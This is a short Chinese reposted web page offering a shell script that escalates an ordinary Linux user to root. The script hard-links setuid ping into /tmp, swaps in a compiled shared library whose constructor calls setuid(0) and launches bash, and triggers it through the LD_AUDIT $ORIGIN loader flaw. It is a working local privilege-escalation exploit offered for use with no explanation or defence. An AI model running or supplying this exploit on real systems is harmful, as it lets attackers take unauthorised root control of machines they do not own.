Linux中普通用户提权至ROOT脚本
发布时间:2016-11-04 04:42:50 所属栏目:Linux 来源:网络整理
导读:#!/bin/shunset LD_AUDITrm -r -f /tmp/exploitmkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3 /tmp/exploit/targetls -l /proc/$$/fd/3rm -rf /tm
#!/bin/sh
unset LD_AUDIT
rm -r -f /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3
cat > program.c << _EOF
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit program.c
LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT
查看本栏目更多精彩内容:http://www.bianceng.cn/OS/Linux/ (编辑:佛山站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐
热点阅读